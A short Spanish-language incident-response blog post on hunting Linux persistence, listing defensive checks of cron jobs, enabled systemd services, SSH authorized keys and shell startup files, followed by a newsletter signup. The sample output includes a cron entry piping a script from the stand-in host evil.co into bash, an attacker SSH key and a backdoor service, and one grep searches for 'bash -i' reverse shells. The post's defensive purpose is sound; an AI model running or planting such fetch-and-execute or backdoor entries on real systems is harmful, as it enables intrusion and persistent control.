~ / blog / dfir
DFIR

Caza de persistencia

Cuando un atacante entra, quiere quedarse.

La persistencia es cómo sobrevive a un reinicio, y estos son los lugares donde esconderla. Revisa el cron del usuario y del sistema: una tarea que descarga y ejecuta algo es una bandera roja enorme.

Mira los servicios de systemd habilitados. Revisa las llaves SSH autorizadas, por si metieron la suya.

Y busca comandos raros en bashrc y en profile. Primero encuentra cómo se queda; después lo sacas.

# los comandos

analyst@victim:~# crontab -lcopiar
* * * * * curl http://evil.co/x.sh | bash
analyst@victim:~# cat /etc/cron.d/* /etc/crontab 2>/dev/nullcopiar
analyst@victim:~# systemctl list-unit-files --state=enabled | grep -i backdoorcopiar
backdoor.service enabled
analyst@victim:~# cat ~/.ssh/authorized_keyscopiar
ssh-rsa AAAAB3... attacker@evil
analyst@victim:~# grep -r 'bash -i' ~/.bashrc /etc/profile.d/ 2>/dev/nullcopiar
root@cero: ~/newsletter
┌──(root@cero)-[~]
└─# suscribir --envio-semanal
un comando a la semana que te hace más difícil de hackear.
una sola herramienta, explicada en español claro, cada semana. lo mejor de los reels, directo a tu correo.
email =
sin spam. un correo a la semana. te sales cuando quieras.